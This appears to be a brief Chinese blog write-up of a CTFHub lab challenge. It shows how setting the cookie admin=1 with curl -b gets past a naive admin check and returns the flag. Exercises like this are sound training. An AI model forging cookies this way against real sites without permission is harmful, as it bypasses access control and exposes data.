a:hover { cursor:url(https://files.cnblogs.com/files/laoguantongxiegogo/click_24px_1231393_easyicon.net.ico),auto; } body { cursor:url(https://files.cnblogs.com/files/laoguantongxiegogo/pointer_24px_1231389_easyicon.net.ico),auto; }

ctfhub HTTP协议-Cookie

题目是cookie,看包

curl -v http://challenge-8dfd6e5521891231.sandbox.ctfhub.com:10080/

hello guest. only admin can get flag.

看到没cookie时Set-Cookie: admin=0

添加cookie admin=1试试

curl -v -b 'admin=1' http://challenge-8dfd6e5521891231.sandbox.ctfhub.com:10080/

得到flag

 

curl -v 是输出全部

    -b  是设置cookie请求

 

posted @ 2020-11-27 10:52  fdgmy  阅读(360)  评论(0)    收藏  举报